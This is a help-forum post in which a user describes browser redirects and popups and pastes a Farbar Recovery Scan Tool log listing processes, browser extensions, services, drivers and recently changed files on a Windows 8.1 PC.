
Keep seeing popups and links are redirected!


  • This topic is locked
4 replies to this topic

#1 romeoashe

  • Members
  • 4 posts

Posted 19 January 2017 - 10:03 AM

I have some malware that redirects my browser and creates multiple windows.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 18-01-2017
Ran by Jeff (administrator) on ROMEO (19-01-2017 08:55:43)
Running from C:\Users\Jeff\Desktop
Loaded Profiles: Jeff (Available Profiles: Jeff)
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\vsserv.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\vsservppl.exe
(Microsoft Corporation) C:\Windows\System32\vmms.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Bitdefender) C:\Program Files\Bitdefender Antivirus Free\bdagent.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Blizzard Entertainment) C:\ProgramData\Battle.net\Agent\Agent.5362\Agent.exe
(Blizzard Entertainment) C:\Program Files (x86)\Battle.net\Battle.net.8288\Battle.net.exe
() C:\Program Files (x86)\Battle.net\Battle.net.8288\Battle.net Helper.exe
() C:\Program Files (x86)\Battle.net\Battle.net.8288\Battle.net Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKU\S-1-5-21-70676196-1044080703-4019811828-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27230168 2016-11-15] (Skype Technologies S.A.)
HKU\S-1-5-21-70676196-1044080703-4019811828-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\Bluestacks\HD-Agent.exe
Startup: C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2016-12-30]
ShortcutTarget: Curse.lnk -> C:\Users\Jeff\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 24.144.0.150 24.144.0.146
Tcpip\..\Interfaces\{2B8372CD-BF51-40C7-A4FA-FB12F4BD7DC1}: [DhcpNameServer] 24.144.0.150 24.144.0.146
Tcpip\..\Interfaces\{9C0B47CE-3980-4819-9C10-D2E7AB8A2565}: [DhcpNameServer] 24.144.0.150 24.144.0.146
ManualProxies: 
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-70676196-1044080703-4019811828-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
 
FireFox:
========
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.facebook.com/"
CHR Profile: C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default [2017-01-19]
CHR Extension: (Google Slides) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-05]
CHR Extension: (Google Docs) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-05]
CHR Extension: (Google Drive) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-05]
CHR Extension: (YouTube) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-05]
CHR Extension: (Adblock Plus) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-01-18]
CHR Extension: (Zonkers Arcade Advertising) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgeepimkkghiifgleeoafaoflhobaa [2017-01-17]
CHR Extension: (Google Sheets) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-05]
CHR Extension: (Google Docs Offline) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-18]
CHR Extension: (Gmail) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-05]
CHR Extension: (Chrome Media Router) - C:\Users\Jeff\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-05]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319376 2014-12-03] (Intel Corporation)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
R2 updatesrv; C:\Program Files\Bitdefender Antivirus Free\updatesrv.exe [100392 2016-11-30] (Bitdefender)
R2 vmms; C:\WINDOWS\system32\vmms.exe [13784064 2015-03-13] (Microsoft Corporation)
R2 vsserv; C:\Program Files\Bitdefender Antivirus Free\vsserv.exe [100392 2016-11-30] (Bitdefender)
R2 vsservppl; C:\Program Files\Bitdefender Antivirus Free\vsservppl.exe [100392 2016-11-30] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Bitdefender Antivirus Free\bdfwfpf.sys [127312 2016-02-22] (BitDefender LLC)
R3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [342016 2016-12-13] (BitDefender S.R.L. Bucharest, ROMANIA)
R1 epp; C:\EEK\bin64\epp.sys [114968 2016-10-31] (Emsisoft Ltd)
R0 gzflt; C:\WINDOWS\System32\drivers\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
S3 lunparser; C:\WINDOWS\System32\drivers\lunparser.sys [19456 2017-01-10] (Microsoft Corporation)
S3 passthruparser; C:\WINDOWS\System32\drivers\passthruparser.sys [22016 2017-01-10] (Microsoft Corporation)
S3 pvhdparser; C:\WINDOWS\System32\drivers\pvhdparser.sys [27136 2016-02-05] (Microsoft Corporation)
R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [1936088 2013-07-31] (Realtek Semiconductor Corporation                           )
R2 trufos; C:\WINDOWS\System32\drivers\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [97320 2015-05-28] (Intel Corporation)
S3 vhdparser; C:\WINDOWS\System32\drivers\vhdparser.sys [18944 2017-01-10] (Microsoft Corporation)
R3 VMSMP; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 VMSP; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 VMSVSF; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 VMSVSP; C:\WINDOWS\system32\DRIVERS\vmswitch.sys [689152 2016-03-03] (Microsoft Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-19 08:55 - 2017-01-19 08:56 - 00010286 _____ C:\Users\Jeff\Desktop\FRST.txt
2017-01-19 05:41 - 2017-01-19 08:07 - 00000000 ____D C:\EEK
2017-01-19 05:40 - 2017-01-19 05:41 - 282736816 _____ C:\Users\Jeff\Downloads\EmsisoftEmergencyKit.exe
2017-01-19 05:37 - 2017-01-19 05:38 - 00023943 _____ C:\Users\Jeff\Downloads\Addition.txt
2017-01-19 05:35 - 2017-01-19 08:55 - 00000000 ____D C:\FRST
2017-01-19 05:35 - 2017-01-19 05:35 - 02419712 _____ (Farbar) C:\Users\Jeff\Desktop\FRST64.exe
2017-01-19 05:29 - 2017-01-19 05:29 - 00209444 _____ C:\TDSSKiller.3.1.0.12_19.01.2017_05.29.03_log.txt
2017-01-19 05:28 - 2017-01-19 05:28 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Jeff\Downloads\tdsskiller.exe
2017-01-19 05:12 - 2017-01-19 05:12 - 00388608 _____ (Trend Micro Inc.) C:\Users\Jeff\Downloads\HijackThis.exe
2017-01-19 01:22 - 2017-01-19 01:22 - 00028750 _____ C:\ProgramData\agent.1484810568.bdinstall.bin
2017-01-19 01:19 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
2017-01-19 01:17 - 2017-01-19 01:17 - 00003640 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-01-19 01:17 - 2017-01-19 01:17 - 00001150 _____ C:\Users\Public\Desktop\Bitdefender Antivirus Free.lnk
2017-01-19 01:17 - 2017-01-19 01:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free
2017-01-19 01:17 - 2016-12-13 18:18 - 00342016 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2017-01-19 01:17 - 2016-10-29 09:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
2017-01-19 01:17 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
2017-01-19 01:17 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
2017-01-19 01:16 - 2017-01-19 08:56 - 00000000 ____D C:\Program Files\Bitdefender Antivirus Free
2017-01-19 01:16 - 2016-06-22 15:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
2017-01-19 01:15 - 2017-01-19 08:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-01-19 01:14 - 2017-01-19 08:20 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-01-19 01:13 - 2017-01-19 01:13 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2017-01-19 01:13 - 2017-01-19 01:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2017-01-19 01:13 - 2017-01-19 01:13 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-01-19 01:13 - 2017-01-19 01:13 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2017-01-19 01:13 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2017-01-19 01:13 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-01-19 01:13 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-01-18 06:09 - 2017-01-18 06:09 - 03988944 _____ C:\Users\Jeff\Downloads\adwcleaner_6.042.exe
2017-01-14 05:00 - 2017-01-14 05:00 - 00000973 _____ C:\Users\Public\Desktop\Minecraft.lnk
2017-01-14 05:00 - 2017-01-14 05:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2017-01-14 04:50 - 2017-01-14 04:50 - 00017152 _____ C:\Users\Jeff\Downloads\MCLeaksAuthenticator.zip
2017-01-12 09:42 - 2016-02-05 08:46 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pvhdparser.sys
2017-01-12 09:42 - 2015-11-05 07:10 - 01398104 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-01-12 09:42 - 2015-11-05 07:10 - 01367384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-01-12 09:42 - 2015-09-29 17:41 - 01391448 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-01-12 09:42 - 2015-09-29 17:41 - 01264472 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-01-12 09:42 - 2015-05-11 18:24 - 00068952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2017-01-12 09:42 - 2015-05-11 18:24 - 00019800 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2017-01-12 09:42 - 2015-03-13 18:18 - 13784064 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmms.exe
2017-01-12 09:42 - 2015-03-08 18:25 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmickvpexchange.dll
2017-01-12 09:42 - 2015-03-08 18:24 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicguestinterface.dll
2017-01-12 09:42 - 2015-03-08 18:23 - 00174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicshutdown.dll
2017-01-12 09:42 - 2015-03-08 18:23 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmictimesync.dll
2017-01-12 09:42 - 2015-03-08 18:22 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicheartbeat.dll
2017-01-12 09:42 - 2015-03-08 18:21 - 00154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicvss.dll
2017-01-12 09:42 - 2015-03-08 18:20 - 00154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmicrdv.dll
2017-01-10 22:28 - 2017-01-19 08:25 - 27590656 _____ C:\WINDOWS\system32\vmguest.iso
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hyper-V Management Tools
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\WINDOWS\vmguest
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\Users\Public\Documents\Hyper-V
2017-01-10 22:24 - 2017-01-10 22:24 - 00000000 ____D C:\Program Files\Hyper-V
2017-01-10 22:14 - 2017-01-10 22:14 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Mozilla
2017-01-10 22:14 - 2017-01-10 22:14 - 00000000 ____D C:\Users\Jeff\AppData\Local\Macromedia
2017-01-10 22:14 - 2016-11-23 07:37 - 00000570 _____ C:\Users\Jeff\AppData\Local\TroubleshooterConfig.json
2017-01-10 22:12 - 2017-01-10 22:55 - 00000000 ____D C:\Users\Jeff\AppData\Local\Bluestacks
2016-12-29 20:01 - 2016-12-29 20:01 - 00000000 ____D C:\WINDOWS\system32\tuv
2016-12-29 19:49 - 2016-12-29 19:49 - 00000000 ____D C:\WINDOWS\TEMPfolder
2016-12-29 19:49 - 2016-12-29 19:49 - 00000000 ____D C:\Program Files\PWIVDSSA88
2016-12-29 19:48 - 2016-12-29 20:06 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-12-28 22:25 - 2017-01-19 01:25 - 00000000 ____D C:\Users\Jeff\AppData\Local\Abmgworks
2016-12-28 22:15 - 2017-01-19 05:56 - 00455048 _____ C:\WINDOWS\ntbtlog.txt
2016-12-28 21:51 - 2017-01-19 05:24 - 00000625 _____ C:\Users\Jeff\Desktop\JRT.txt
2016-12-28 21:48 - 2017-01-19 07:57 - 00000000 ____D C:\AdwCleaner
2016-12-28 21:47 - 2016-12-28 21:47 - 01663040 _____ (Malwarebytes) C:\Users\Jeff\Downloads\JRT.exe
2016-12-28 20:56 - 2016-12-28 20:56 - 00000004 _____ C:\Users\Jeff\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
2016-12-28 20:49 - 2017-01-19 01:25 - 00000000 ____D C:\Users\Jeff\AppData\Local\Epkttion
2016-12-27 21:52 - 2016-12-27 21:52 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Macromedia
2016-12-27 21:51 - 2016-12-27 21:51 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\TheBannerSaga2
2016-12-27 21:51 - 2016-12-27 21:51 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Steam
2016-12-27 21:49 - 2016-12-30 19:33 - 00001237 _____ C:\Users\Jeff\Desktop\The Banner Saga 2.lnk
2016-12-27 21:49 - 2016-12-27 21:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Banner Saga 2
2016-12-27 21:46 - 2016-12-27 21:49 - 00000000 ____D C:\Program Files (x86)\The Banner Saga 2
2016-12-27 21:46 - 2016-12-27 21:46 - 00003324 _____ C:\WINDOWS\System32\Tasks\SessionAgent
2016-12-27 17:21 - 2017-01-19 02:06 - 00000000 ____D C:\Users\Jeff\Downloads\The Banner Saga 2+crack incl
2016-12-23 02:41 - 2016-12-30 19:34 - 00047104 ___SH C:\Users\Jeff\Desktop\Thumbs.db
2016-12-23 02:40 - 2016-12-23 02:40 - 00002092 _____ C:\Users\Jeff\AppData\Local\recently-used.xbel
2016-12-23 02:20 - 2016-12-23 02:40 - 00000000 ____D C:\Users\Jeff\AppData\Local\gtk-2.0
2016-12-23 02:20 - 2016-12-23 02:20 - 00000000 ____D C:\Users\Jeff\.thumbnails
2016-12-23 02:17 - 2016-12-23 02:17 - 00000000 ____D C:\Users\Jeff\AppData\Local\fontconfig
2016-12-23 02:16 - 2016-12-23 02:40 - 00000000 ____D C:\Users\Jeff\.gimp-2.8
2016-12-23 02:16 - 2016-12-23 02:16 - 00000000 ____D C:\Users\Jeff\AppData\Local\gegl-0.2
2016-12-20 15:35 - 2017-01-10 15:56 - 00000000 ____D C:\Romeo
2016-12-20 15:35 - 2016-12-30 19:33 - 00000660 _____ C:\Users\Jeff\Desktop\Romeo - Shortcut.lnk
2016-12-20 00:16 - 2015-07-30 08:04 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-12-20 00:16 - 2015-07-30 07:48 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-19 08:56 - 2016-12-05 02:17 - 00000000 ____D C:\Users\Jeff\AppData\Local\Battle.net
2017-01-19 08:20 - 2016-12-05 02:16 - 00000000 ____D C:\Program Files (x86)\Battle.net
2017-01-19 08:16 - 2016-12-05 01:11 - 00863596 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-01-19 08:16 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\Inf
2017-01-19 08:12 - 2016-12-05 02:41 - 00003606 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-01-19 08:11 - 2016-12-05 02:30 - 00000000 __SHD C:\Users\Jeff\IntelGraphicsProfiles
2017-01-19 08:10 - 2013-08-22 08:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-01-19 05:15 - 2013-08-22 07:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2017-01-19 05:12 - 2016-12-05 01:10 - 00000000 ____D C:\Users\Jeff\AppData\Local\VirtualStore
2017-01-19 04:23 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\rescache
2017-01-19 02:22 - 2016-12-05 01:15 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-70676196-1044080703-4019811828-1001
2017-01-18 19:27 - 2016-12-19 11:57 - 00002465 _____ C:\Users\Jeff\Desktop\Hearthstone Deck Tracker.lnk
2017-01-18 19:27 - 2016-12-19 11:57 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HearthSim
2017-01-18 19:27 - 2016-12-19 11:57 - 00000000 ____D C:\Users\Jeff\AppData\Local\SquirrelTemp
2017-01-18 19:27 - 2016-12-19 11:57 - 00000000 ____D C:\Users\Jeff\AppData\Local\HearthstoneDeckTracker
2017-01-18 06:19 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\AppCompat
2017-01-17 23:12 - 2016-12-05 02:15 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Curse Client
2017-01-17 17:43 - 2016-12-05 16:07 - 00000000 ____D C:\Users\Jeff\AppData\Roaming\Skype
2017-01-16 03:53 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-01-15 01:29 - 2013-08-22 09:20 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-14 09:45 - 2016-12-07 00:51 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-01-14 09:42 - 2016-12-07 00:50 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-01-14 05:23 - 2016-12-05 16:20 - 00001125 _____ C:\Users\Jeff\Desktop\nativelog.txt
2017-01-14 05:01 - 2016-12-05 16:10 - 00000000 ____D C:\Program Files (x86)\Minecraft
2017-01-10 22:55 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Public\Libraries
2017-01-10 22:24 - 2016-12-10 02:55 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\vsconfig.dll
2017-01-10 22:24 - 2016-12-10 02:48 - 00704000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Wnv.sys
2017-01-10 22:24 - 2016-12-10 02:47 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wnvapi.dll
2017-01-10 22:24 - 2016-12-10 02:47 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\system32\RdvGpuInfo.dll
2017-01-10 22:24 - 2016-12-10 00:06 - 06287872 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmwp.exe
2017-01-10 22:24 - 2016-12-10 00:01 - 02267136 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdp4vs.dll
2017-01-10 22:24 - 2016-12-08 14:48 - 00421376 _____ (Microsoft Corporation) C:\WINDOWS\system32\synthnic.dll
2017-01-10 22:24 - 2016-12-08 14:48 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmulatedNic.dll
2017-01-10 22:24 - 2016-12-08 14:44 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\synthstor.dll
2017-01-10 22:24 - 2016-12-08 14:44 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\system32\synthfcvdev.dll
2017-01-10 22:24 - 2016-12-08 14:43 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdparser.sys
2017-01-10 22:24 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\schemas
2017-01-10 22:24 - 2013-08-22 05:48 - 00014688 _____ C:\WINDOWS\system32\sbresources.dll
2017-01-10 22:24 - 2013-08-22 05:46 - 01466522 _____ C:\WINDOWS\system32\WindowsVirtualization.V2.mof
2017-01-10 22:24 - 2013-08-22 05:39 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\passthruparser.sys
2017-01-10 22:24 - 2013-08-22 05:39 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\lunparser.sys
2017-01-10 22:24 - 2013-08-22 05:38 - 00039739 _____ C:\WINDOWS\system32\hypervisor.mof
2017-01-10 22:24 - 2013-08-22 04:59 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\HyperVSysprepProvider.dll
2017-01-10 22:24 - 2013-08-22 04:35 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteFileBrowse.dll
2017-01-10 22:24 - 2013-08-22 03:39 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbusvdev.dll
2017-01-10 22:24 - 2013-08-22 02:25 - 00533504 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmconnect.exe
2017-01-10 22:24 - 2013-08-22 01:35 - 00144967 _____ C:\WINDOWS\system32\virtmgmt.msc
2017-01-10 22:23 - 2013-08-22 03:53 - 00033280 _____ C:\WINDOWS\system32\ActivationVdev.dll
2017-01-10 22:23 - 2013-08-22 03:38 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmprox.dll
2017-01-10 22:23 - 2013-08-22 03:38 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmwpctrl.dll
2017-01-06 17:44 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-12-30 19:33 - 2016-12-14 00:55 - 00001726 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-12-30 19:33 - 2016-12-11 02:13 - 00001014 _____ C:\Users\Jeff\Desktop\Cronus PRO.lnk
2016-12-30 19:33 - 2016-12-09 12:42 - 00001453 _____ C:\Users\Jeff\Desktop\DAOrigins.exe - Shortcut.lnk
2016-12-30 19:33 - 2016-12-06 21:47 - 00001765 _____ C:\Users\Public\Desktop\Dragon Age Origins.lnk
2016-12-30 19:33 - 2016-12-05 16:07 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2016-12-30 19:33 - 2016-12-05 02:33 - 00000968 _____ C:\Users\Public\Desktop\Hearthstone.lnk
2016-12-30 19:33 - 2016-12-05 02:26 - 00000896 _____ C:\Users\Jeff\Desktop\Downloads - Shortcut.lnk
2016-12-30 19:33 - 2016-12-05 02:22 - 00001806 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2016-12-30 19:33 - 2016-12-05 02:22 - 00001788 _____ C:\Users\Public\Desktop\Vuze.lnk
2016-12-30 19:33 - 2016-12-05 02:17 - 00000930 _____ C:\Users\Public\Desktop\Battle.net.lnk
2016-12-30 19:33 - 2016-12-05 02:15 - 00001082 _____ C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Curse.lnk
2016-12-30 19:33 - 2016-12-05 02:15 - 00001076 _____ C:\Users\Jeff\Desktop\Curse.lnk
